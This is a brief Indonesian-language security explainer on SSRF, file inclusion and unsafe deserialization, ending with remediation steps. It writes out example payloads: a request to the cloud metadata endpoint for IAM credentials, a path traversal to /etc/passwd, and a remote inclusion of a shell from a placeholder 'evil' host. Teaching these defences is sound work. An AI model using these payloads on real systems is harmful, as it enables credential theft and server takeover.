SSRF, File Inclusion & Deserialization
SSRF memaksa server mengakses sumber yang tak seharusnya:
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
Dampak: bocornya metadata cloud, akses layanan internal. File inclusion:
index.php?page=../../etc/passwd (LFI)
index.php?page=http://evil/shell.txt (RFI)
Unsafe deserialization mengeksekusi objek dari data tak terpercaya. Perbaikan: - Allowlist tujuan & skema URL - Validasi path, hindari menggabung input mentah - Jangan deserialisasi data dari sumber tak terpercaya - Segmentasi jaringan, block metadata endpoint dari aplikasi.